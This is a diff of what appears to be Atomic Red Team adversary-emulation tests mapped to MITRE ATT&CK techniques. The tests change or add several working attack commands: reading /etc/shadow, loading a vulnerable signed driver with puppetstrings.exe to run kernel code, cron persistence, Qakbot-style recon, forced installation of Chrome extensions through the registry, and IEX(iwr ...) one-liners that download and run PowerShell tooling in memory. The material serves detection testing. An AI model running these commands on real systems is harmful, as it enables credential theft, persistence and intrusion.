+'
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'chrome must be installed
+
+'
+        prereq_command: if (cmd /c "chrome 2>nul") {exit 0} else {exit 1}
+        get_prereq_command: |
+          Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url}
+          Start-Process $env:temp\ChromeStandaloneSetup64.exe /S
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          $extList = #{extension_id}
+          foreach ($extension in $extList) {
+            New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force
+            New-ItemProperty -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -Name "update_url" -Value "https://clients2.google.com/service/update2/crx" -PropertyType "String" -Force}
+          Start-Process -FilePath "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
+          Start-Sleep -Seconds 30
+          Stop-Process -Name "chrome"
+        cleanup_command: |-
+          $extList = #{extension_id}
+          foreach ($extension in $extList) {
+          Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -ErrorAction Ignore}
  T1200:
    technique:
      id: attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9
@@ -0,0 +1,82 @@
+# T1003.008 - /etc/passwd and /etc/shadow
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/008)
+<blockquote>Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
+
+The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) <code># /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db</code>
+</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Access /etc/shadow (Local)](#atomic-test-1---access-etcshadow-local)
+
+- [Atomic Test #2 - Access /etc/passwd (Local)](#atomic-test-2---access-etcpasswd-local)
+
+
+<br/>
+
+## Atomic Test #1 - Access /etc/shadow (Local)
+/etc/shadow file is accessed in Linux environments
+
+**Supported Platforms:** Linux
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+sudo cat /etc/shadow > #{output_file}
+cat #{output_file}
+```
+
+#### Cleanup Commands:
+```bash
+rm -f #{output_file}
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Access /etc/passwd (Local)
+/etc/passwd file is accessed in Linux environments
+
+**Supported Platforms:** Linux
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+cat /etc/passwd > #{output_file}
+cat #{output_file}
+```
+
+#### Cleanup Commands:
+```sh
+rm -f #{output_file}
+```
+
+
+
+
+
+<br/>
@@ -0,0 +1,40 @@
+attack_technique: T1003.008
+display_name: 'OS Credential Dumping: /etc/passwd and /etc/shadow'
+atomic_tests:
+- name: Access /etc/shadow (Local)
+  auto_generated_guid: 3723ab77-c546-403c-8fb4-bb577033b235
+  description: |
+    /etc/shadow file is accessed in Linux environments
+  supported_platforms:
+  - linux
+  input_arguments:
+    output_file:
+      description: Path where captured results will be placed
+      type: Path
+      default: /tmp/T1003.008.txt
+  executor:
+    command: |
+      sudo cat /etc/shadow > #{output_file}
+      cat #{output_file}
+    cleanup_command: |
+      rm -f #{output_file}
+    name: bash
+    elevation_required: true
+- name: Access /etc/passwd (Local)
+  auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d
+  description: |
+    /etc/passwd file is accessed in Linux environments
+  supported_platforms:
+  - linux
+  input_arguments:
+    output_file:
+      description: Path where captured results will be placed
+      type: Path
+      default: /tmp/T1003.008.txt
+  executor:
+    command: |
+      cat /etc/passwd > #{output_file}
+      cat #{output_file}
+    cleanup_command: |
+      rm -f #{output_file}
+    name: sh
@@ -124,13 +124,14 @@ sudo depmod -a

 ## Atomic Test #3 - Windows Signed Driver Rootkit Test
 This test exploits a signed driver to execute code in Kernel.
+This example was curated from a blog that utilizes puppetstrings.exe with the vulnerable (signed driver) capcom.sys. 
+The capcom.sys driver may be found on github. A great reference is here: http://www.fuzzysecurity.com/tutorials/28.html
 SHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7
 We leverage the work done here:
 https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html
 The hash of our PoC Exploit is
 SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441
 This will simulate hiding a process.
-It would be wise if you only run this in a test environment

 **Supported Platforms:** Windows

@@ -140,19 +141,32 @@ It would be wise if you only run this in a test environment
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| driver_path | Path to the vulnerable driver | Path | C:&#92;Drivers&#92;driver.sys|
+| driver_path | Path to a vulnerable driver | Path | C:&#92;Drivers&#92;driver.sys|
+| puppetstrings_path | Path of puppetstrings.exe | Path | PathToAtomicsFolder&#92;T1014&#92;bin&#92;puppetstrings.exe|


-#### Attack Commands: Run with `command_prompt`! 
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 


 ```cmd
-puppetstrings #{driver_path}
+#{puppetstrings_path} #{driver_path}
 ```




+#### Dependencies:  Run with `powershell`!
+##### Description: puppetstrings.exe must exist on disk at specified location (#{puppetstrings_path})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1014/bin/puppetstrings.exe" -OutFile "#{puppetstrings_path}"
+```
+
+


 <br/>
@@ -92,22 +92,39 @@ atomic_tests:
  auto_generated_guid: 8e4e1985-9a19-4529-b4b8-b7a49ff87fae
  description: |
    This test exploits a signed driver to execute code in Kernel.
+    This example was curated from a blog that utilizes puppetstrings.exe with the vulnerable (signed driver) capcom.sys. 
+    The capcom.sys driver may be found on github. A great reference is here: http://www.fuzzysecurity.com/tutorials/28.html
    SHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7
    We leverage the work done here:
    https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html
    The hash of our PoC Exploit is
    SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441
    This will simulate hiding a process.
-    It would be wise if you only run this in a test environment
+
  supported_platforms:
-  - windows
+    - windows
+
  input_arguments:
    driver_path:
-      description: Path to the vulnerable driver
+      description: Path to a vulnerable driver
      type: Path
      default: C:\Drivers\driver.sys
+    puppetstrings_path:
+      description: Path of puppetstrings.exe
+      type: Path
+      default: PathToAtomicsFolder\T1014\bin\puppetstrings.exe
+  
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      puppetstrings.exe must exist on disk at specified location (#{puppetstrings_path})
+    prereq_command: |
+      if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1014/bin/puppetstrings.exe" -OutFile "#{puppetstrings_path}"
+      
  executor:
-    command: |
-      puppetstrings #{driver_path}
    name: command_prompt
-
+    command: |
+      #{puppetstrings_path} #{driver_path}
+    elevation_required: true
@@ -18,6 +18,8 @@ Adversaries may use the information from [System Network Configuration Discovery

 - [Atomic Test #6 - Adfind - Enumerate Active Directory Subnet Objects](#atomic-test-6---adfind---enumerate-active-directory-subnet-objects)

+- [Atomic Test #7 - Qakbot Recon](#atomic-test-7---qakbot-recon)
+

 <br/>

@@ -250,4 +252,33 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste



+<br/>
+<br/>
+
+## Atomic Test #7 - Qakbot Recon
+A list of commands known to be performed by Qakbot for recon purposes
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| recon_commands | File that houses list of commands to be executed | Path | PathToAtomicsFolder&#92;T1016&#92;src&#92;qakbot.bat|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+#{recon_commands}
+```
+
+
+
+
+
+
 <br/>
@@ -148,6 +148,7 @@ atomic_tests:
    name: command_prompt

 - name: Qakbot Recon
+  auto_generated_guid: 121de5c6-5818-4868-b8a7-8fd07c455c1b
  description: A list of commands known to be performed by Qakbot for recon purposes
  supported_platforms:
  - windows
@@ -23,7 +23,7 @@ atomic_tests:
      quser
      qwinsta.exe /server:#{computer_name}
      qwinsta.exe
-      for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
+      for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt
      @FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
    name: command_prompt
 - name: System Owner/User Discovery
@@ -50,4 +50,3 @@ atomic_tests:
    command: |
      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Invoke-UserHunter -Stealth -Verbose
    name: powershell
-
@@ -8,7 +8,9 @@ An adversary may use <code>cron</code> in Linux or Unix environments to execute

 - [Atomic Test #1 - Cron - Replace crontab with referenced file](#atomic-test-1---cron---replace-crontab-with-referenced-file)

- [Atomic Test #2 - Cron - Add script to cron folder](#atomic-test-2---cron---add-script-to-cron-folder)
+- [Atomic Test #2 - Cron - Add script to all cron subfolders](#atomic-test-2---cron---add-script-to-all-cron-subfolders)
+
+- [Atomic Test #3 - Cron - Add script to /var/spool/cron/crontabs/ folder](#atomic-test-3---cron---add-script-to-varspoolcroncrontabs-folder)


 <br/>
@@ -48,8 +50,8 @@ crontab /tmp/notevil
 <br/>
 <br/>

-## Atomic Test #2 - Cron - Add script to cron folder
-This test adds a script to a cron folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
+## Atomic Test #2 - Cron - Add script to all cron subfolders
+This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.

 **Supported Platforms:** macOS, Linux

@@ -68,11 +70,51 @@ This test adds a script to a cron folder configured to execute on a schedule. Th

 ```bash
 echo "#{command}" > /etc/cron.daily/#{cron_script_name}
+echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
+echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
+echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
 ```

 #### Cleanup Commands:
 ```bash
 rm /etc/cron.daily/#{cron_script_name}
+rm /etc/cron.hourly/#{cron_script_name}
+rm /etc/cron.monthly/#{cron_script_name}
+rm /etc/cron.weekly/#{cron_script_name}
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Cron - Add script to /var/spool/cron/crontabs/ folder
+This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
+
+**Supported Platforms:** Linux
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log|
+| cron_script_name | Name of file to store in /var/spool/cron/crontabs folder | string | persistevil|
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
+```
+
+#### Cleanup Commands:
+```bash
+rm /var/spool/cron/crontabs/#{cron_script_name}
 ```


@@ -30,10 +30,10 @@ atomic_tests:
    cleanup_command: |
      crontab /tmp/notevil

- name: Cron - Add script to cron folder
+- name: Cron - Add script to all cron subfolders
  auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
  description: |
-    This test adds a script to a cron folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
+    This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.

  supported_platforms:
    - macos
@@ -54,5 +54,36 @@ atomic_tests:
    name: bash
    command: |
      echo "#{command}" > /etc/cron.daily/#{cron_script_name}
+      echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
+      echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
+      echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
    cleanup_command: |
      rm /etc/cron.daily/#{cron_script_name}
+      rm /etc/cron.hourly/#{cron_script_name}
+      rm /etc/cron.monthly/#{cron_script_name}
+      rm /etc/cron.weekly/#{cron_script_name}
+      
+- name: Cron - Add script to /var/spool/cron/crontabs/ folder
+  auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4
+  description: |
+    This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
+  supported_platforms:
+    - linux
+
+  input_arguments:
+    command:
+      description: Command to execute
+      type: string
+      default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log
+    cron_script_name:
+      description: Name of file to store in /var/spool/cron/crontabs folder
+      type: string
+      default: persistevil
+
+  executor:
+    elevation_required: true
+    name: bash
+    command: |
+      echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
+    cleanup_command: |
+      rm /var/spool/cron/crontabs/#{cron_script_name}
@@ -42,6 +42,7 @@ information will be displayed.
 net localgroup
 net group /domain
 net group "domain admins" /domain
+net group "enterprise admins" /domain
 ```


@@ -0,0 +1,66 @@
+# T1133 - External Remote Services
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1133)
+<blockquote>Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) can also be used externally.
+
+Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Running Chrome VPN Extensions via the Registry 2 vpn extension](#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension)
+
+
+<br/>
+
+## Atomic Test #1 - Running Chrome VPN Extensions via the Registry 2 vpn extension
+Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| chrome_url | chrome installer download URL | url | https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe|
+| extension_id | chrome extension id | String | "fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme"|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$extList = #{extension_id}
+foreach ($extension in $extList) {
+  New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force
+  New-ItemProperty -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -Name "update_url" -Value "https://clients2.google.com/service/update2/crx" -PropertyType "String" -Force}
+Start-Process -FilePath "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
+Start-Sleep -Seconds 30
+Stop-Process -Name "chrome"
+```
+
+#### Cleanup Commands:
+```powershell
+$extList = #{extension_id}
+foreach ($extension in $extList) {
+Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -ErrorAction Ignore}
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: chrome must be installed
+##### Check Prereq Commands:
+```powershell
+if (cmd /c "chrome 2>nul") {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url}
+Start-Process $env:temp\ChromeStandaloneSetup64.exe /S
+```
+
+
+
+
+<br/>
@@ -0,0 +1,48 @@
+---
+attack_technique: T1133  
+display_name: External Remote Services  
+
+atomic_tests:
+- name: Running Chrome VPN Extensions via the Registry 2 vpn extension
+  auto_generated_guid: 4c8db261-a58b-42a6-a866-0a294deedde4
+  description: |
+    Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    chrome_url:
+      description: chrome installer download URL
+      type: url
+      default: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe
+    extension_id:
+      description: chrome extension id
+      type: String
+      default: | 
+        "fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme"
+
+  dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands
+  dependencies: # (optional)
+    - description: |
+        chrome must be installed
+      prereq_command: 'if (cmd /c "chrome 2>nul") {exit 0} else {exit 1}'
+      get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq
+        Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url}
+        Start-Process $env:temp\ChromeStandaloneSetup64.exe /S
+        
+  executor:
+    name: powershell
+    elevation_required: true
+    command: | # these are the actaul attack commands, at least one command must be provided
+      $extList = #{extension_id}
+      foreach ($extension in $extList) {
+        New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force
+        New-ItemProperty -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -Name "update_url" -Value "https://clients2.google.com/service/update2/crx" -PropertyType "String" -Force}
+      Start-Process -FilePath "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
+      Start-Sleep -Seconds 30
+      Stop-Process -Name "chrome"
+    cleanup_command: | # you can remove the cleanup_command section if there are no cleanup commands
+      $extList = #{extension_id}
+      foreach ($extension in $extList) {
+      Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -ErrorAction Ignore}
@@ -0,0 +1,110 @@
+ZenMate VPN - fdcgdnkidjaadafnichfpabhfomcebme
+1clickVPN - fcfhplploccackoneaefokcmbjfbkenj
+Touch VPN - bihmplhobchoageeokmgbdihknkjbknd
+Hola Free VPN - gkojfkhlekighikafcpjkiklfbnlmeio
+Astar VPN - jajilbjjinjmgcibalaakngmkilboobh
+VPN Free - gjknjjomckknofjidppipffbpoekiipm
+Earth VPN - nabbmpekekjknlbkgpodfndbodhijjem
+DotVPN - kpiecbcckbofpmkkkdibbllpinceiihk
+Hotspot Shield Free VPN - nlbejmccbhkncgokjcmghpfloaajcffj
+Browsec VPN - omghfjlpggmjjaagoclmmobgdodcjboh
+VPN-free.pro - bibjcjfmgapbfoljiojpipaooddpkpai
+VPN Unlimited Free - mpcaainmfjjigeicjnlkdfajbioopjko
+PP VPN - jljopmgdobloagejpohpldgkiellmfnc
+IP Unblock - lochiccbgeohimldjooaakjllnafhaid
+Surf VPN - nhnfcgpcbfclhfafjlooihdfghaeinfc
+iNinja VPN - ookhnhpkphagefgdiemllfajmkdkcaim
+Daily VPN - namfblliamklmeodpcelkokjbffgmeoo
+Hoxx VPN Proxy - nbcojefnccbanplpoffopkoepjmhgdgh
+Free VPN - majdfhpaihoncoakbjgbdhglocklcgno
+VPN PROXY MASTER - lnfdmdhmfbimhhpaeocncdlhiodoblbd
+Urban Free VPN - eppiocemhmnlbhjplcgkofciiegomcon
+SaferVPN Proxy - cocfojppfigjeefejbpfmedgjbpchcng
+VPN Professional - foiopecknacmiihiocgdjgbjokkpkohc
+AdGuard VPN - hhdobjgopfphlmjbmnpglhfcgppchgje
+Free VPN - jgbaghohigdbgbolncodkdlpenhcmcge
+Free One Touch VPN - inligpkjkhbpifecbdjhmdpcfhnlelja
+Unlimited VPN & Proxy by ibVPN - higioemojdadgdbhbbbkfbebbdlfjbip
+RusVPN - hipncndjamdcmphkgngojegjblibadbe
+Azino VPN - iolonopooapdagdemdoaihahlfkncfgg
+Pron VPN - nhfjkakglbnnpkpldhjmpmmfefifedcj
+Free Residential VPN - jpgljfpmoofbmlieejglhonfofmahini
+ExpressVPN - fgddmllnllkalaagkghckoinaemmogpe
+Hotspot Shield Elite VPN Proxy - ejkaocphofnobjdedneohbbiilggdlbi
+Hide My IP VPN - keodbianoliadkoelloecbhllnpiocoi
+Tunnello VPN - hoapmlpnmpaehilehggglehfdlnoegck
+HMA VPN Proxy Unblocker - poeojclicodamonabcabmapamjkkmnnk
+Free Avira Phantom VPN - dfkdflfgjdajbhocmfjolpjbebdkcjog
+Hola VPN - kcdahmgmaagjhocpipbodaokikjkampi
+Free VPN for Chrome - klnkiajpmpkkkgpgbogmcgfjhdoljacg
+Hub VPN - lneaocagcijjdpkcabeanfpdbmapcjjg
+Free Proxy VPN - pgfpignfckbloagkfnamnolkeaecfgfh
+Private Internet Access - jplnlifepflhkbkgonidnobkakhmpnmh
+Turbo VPN for PC - jliodmnojccaloajphkingdnpljdhdok
+Windscribe - hnmpcagpplmpfojmgmnngilcnanddlhb
+CyberGhost VPN - ffbkglfijbcbgblgflchnbphjdllaogb
+VPN.AC - kcndmbbelllkmioekdagahekgimemejo
+Browser VPN - jdgilggpfmjpbodmhndmhojklgfdlhob
+DEEPRISM VPN - bihhflimonbpcfagfadcnbbdngpopnjb
+My Browser Vpn - ppajinakbfocjfnijggfndbdmjggcmde
+SetupVPN - oofgbpoabipfcfjapgnbbjjaenockbdp
+Wachee VPN - bhnhkdgoefpmekcgnccpnhjfdgicfebm
+Thunder Proxy - knmmpciebaoojcpjjoeonlcjacjopcpf
+Free Proxy VPN - dhadilbmmjiooceioladdphemaliiobo
+FastestVPN Proxy - jedieiamjmoflcknjdjhpieklepfglin
+WorkingVPN - mhngpdlhojliikfknhfaglpnddniijfh
+TunnelBear VPN - omdakjcmkglenbhjadbccaookpfjihpa
+BelkaVPN - npgimkapccfidfkfoklhpkgmhgfejhbj
+VPN Master - akeehkgglkmpapdnanoochpfmeghfdln
+Unblock Websites - gbmdmipapolaohpinhblmcnpmmlgfgje
+Lethean Proxy VPN - aigmfoeogfnljhnofglledbhhfegannp
+Whoer VPN - cgojmfochfikphincbhokimmmjenhhgk
+Best VPN USA - ficajfeojakddincjafebjmfiefcmanc
+FREE VPN DEWELOPMENT - ifnaibldjfdmaipaddffmgcmekjhiloa
+apkfold free vpn - jbnmpdkcfkochpanomnkhnafobppmccn
+Soul VPN - apcfdffemoinopelidncddjbhkiblecc
+DotVPN - mjolnodfokkkaichkcjipfgblbfgojpa
+rderzh VPN Proxy - oifjbnnafapeiknapihcmpeodaeblbkn
+Red Panda VPN - plpmggfglncceinmilojdkiijhmajkjh
+Ultrareach VPN - mjnbclmflcpookeapghfhapeffmpodij
+FastStunnel VPN - bblcccknbdbplgmdjnnikffefhdlobhp
+VirtualShield VPN - aojlhgbkmkahabcmcpifbolnoichfeep
+Adblock Office VPN Proxy Server - lcmammnjlbmlbcaniggmlejfjpjagiia
+Guru VPN & Proxy - knajdeaocbpmfghhmijicidfcmdgbdpm
+Malus VPN - bdlcnpceagnkjnjlbbbcepohejbheilk
+Muscle VPN - edknjdjielmpdlnllkdmaghlbpnmjmgb
+Push VPN - eidnihaadmmancegllknfbliaijfmkgo
+Gom VPN - ckiahbcmlmkpfiijecbpflfahoimklke
+Free Fast VPN - macdlemfnignjhclfcfichcdhiomgjjb
+BullVPN - chioafkonnhbpajpengbalkececleldf
+HideAll VPN - amnoibeflfphhplmckdbiajkjaoomgnj
+ProxyFlow - llbhddikeonkpbhpncnhialfbpnilcnc
+Cloud VPN - pcienlhnoficegnepejpfiklggkioccm
+sVPN - iocnglnmfkgfedpcemdflhkchokkfeii
+Social VPN - igahhbkcppaollcjeaaoapkijbnphfhb
+Trellonet Trellonet - njpmifchgidinihmijhcfpbdmglecdlb
+WindmillVPN - ggackgngljinccllcmbgnpgpllcjepgc
+IPBurger Proxy & VPN - kchocjcihdgkoplngjemhpplmmloanja 
+Veee - bnijmipndnicefcdbhgcjoognndbgkep
+Anonymous Proxy Vpn Browser - lklekjodgannjcccdlbicoamibgbdnmi
+Hideman VPN - dbdbnchagbkhknegmhgikkleoogjcfge
+Fornex VPN - egblhcjfjmbjajhjhpmnlekffgaemgfh
+WeVPN - ehbhfpfdkmhcpaehaooegfdflljcnfec
+VPNMatic - bkkgdjpomdnfemhhkalfkogckjdkcjkg
+Urban Shield - almalgbpmcfpdaopimbdchdliminoign
+Prime VPN - akkbkhnikoeojlhiiomohpdnkhbkhieh
+westwind - gbfgfbopcfokdpkdigfmoeaajfmpkbnh
+Upnet - bniikohfmajhdcffljgfeiklcbgffppl
+uVPN - lejgfmmlngaigdmmikblappdafcmkndb
+Nucleus VPN - ffhhkmlgedgcliajaedapkdfigdobcif
+Touch VPN - bihmplhobchoageeokmgbdihknkjbknd
+FoxyProxy Standard - gcknhkkoolaabfmlnjonogaaifnjlfnp
+GeoProxy - pooljnboifbodgifngpppfklhifechoe
+NordVPN - fjoaledfpmneenckfbpdfhkmimnjocfa
+ProxFlow - aakchaleigkohafkfjfjbblobjifikek
+Proxy SwitchySharp - dpplabbmogkhghncfbfdeeokoefdjegm
+Proxy SwitchyOmega - padekgcemlokbadohgkifijomclgjgif
+PureVPN - bfidboloedlamgdmenmlbipfnccokknp
+RusVPN - hipncndjamdcmphkgngojegjblibadbe
+SaferVPN - cocfojppfigjeefejbpfmedgjbpchcng
+TunnelBear VPN - omdakjcmkglenbhjadbccaookpfjihpa
@@ -6,7 +6,6 @@ atomic_tests:
  description: |
    This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe.
    Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
-
    This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns
    References:
      https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader
@@ -23,26 +22,29 @@ atomic_tests:
      type: String
      default: Word
    ms_office_version:
-      description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office"
+      description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version.
      type: String
-      default: "16.0"
+      default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0]
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
    prereq_command: |
-      If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }
+      $ms_office_version = #{ms_office_version}
+      If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
    get_prereq_command: |
      $msword = New-Object -ComObject word.application
      Stop-Process -Name WINWORD
  executor:
    command: |
      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+      $ms_office_version = #{ms_office_version}
      $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"cscript.exe #{jse_path}`"`n"
-      Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
+      Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
    cleanup_command: |
      if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
-      Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+      $ms_office_version = #{ms_office_version}
+      Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
    name: powershell
